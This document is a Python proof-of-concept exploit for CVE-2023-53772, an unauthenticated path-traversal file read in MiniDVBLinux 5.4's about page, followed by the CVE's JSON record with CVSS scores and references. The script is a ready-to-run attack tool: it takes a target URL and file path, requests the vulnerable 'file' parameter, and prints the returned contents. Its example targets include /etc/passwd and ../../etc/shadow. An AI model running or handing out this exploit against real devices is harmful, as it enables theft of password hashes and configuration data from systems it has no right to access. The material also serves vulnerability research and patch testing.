CVE-2023-53772

# CVE-2023-53772 MiniDVBLinux Arbitrary File Read PoC # Vulnerability: Path traversal in 'file' GET parameter on about page # CVSS: 7.5 (High) import requests import sys def exploit_minidvblinux(target_url, file_path): """ Exploit arbitrary file read vulnerability in MiniDVBLinux about page. Args: target_url: Base URL of the vulnerable MiniDVBLinux instance file_path: Path to the file to read (absolute or relative) Returns: File contents if successful, None otherwise """ # Construct the exploit URL with the 'file' parameter exploit_url = f"{target_url}/about?file={file_path}" print(f"[*] Target: {target_url}") print(f"[*] Attempting to read: {file_path}") print(f"[*] Exploit URL: {exploit_url}") try: # Send GET request without any authentication response = requests.get(exploit_url, timeout=10) if response.status_code == 200: print(f"[+] Success! File contents:") print("=" * 50) print(response.text) print("=" * 50) return response.text else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2023-53772.py <target_url> <file_path>") print("Example: python cve-2023-53772.py http://192.168.1.100 /etc/passwd") sys.exit(1) target = sys.argv[1] file_path = sys.argv[2] exploit_minidvblinux(target, file_path) # Example targets: # Read password file: /etc/passwd # Read shadow file: ../../etc/shadow # Read application config: /etc/minidlna.conf # Read system log: /var/log/syslog

{"cve": {"id": "CVE-2023-53772", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:52.470", "lastModified": "2025-12-19T19:20:23.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MiniDVBLinux 5.4 contains an arbitrary file disclosure vulnerability that allows attackers to read sensitive system files through the 'file' GET parameter. Attackers can exploit the about page by supplying file paths to disclose arbitrary file contents on the affected device."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:minidvblinux:minidvblinux:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.4", "matchCriteriaId": "2D9CAD03-85CC-41CC-B745-371250902E61"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51097", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.minidvblinux.de", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/minidvblinux-arbitrary-file-read-vulnerability-via-about-page", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}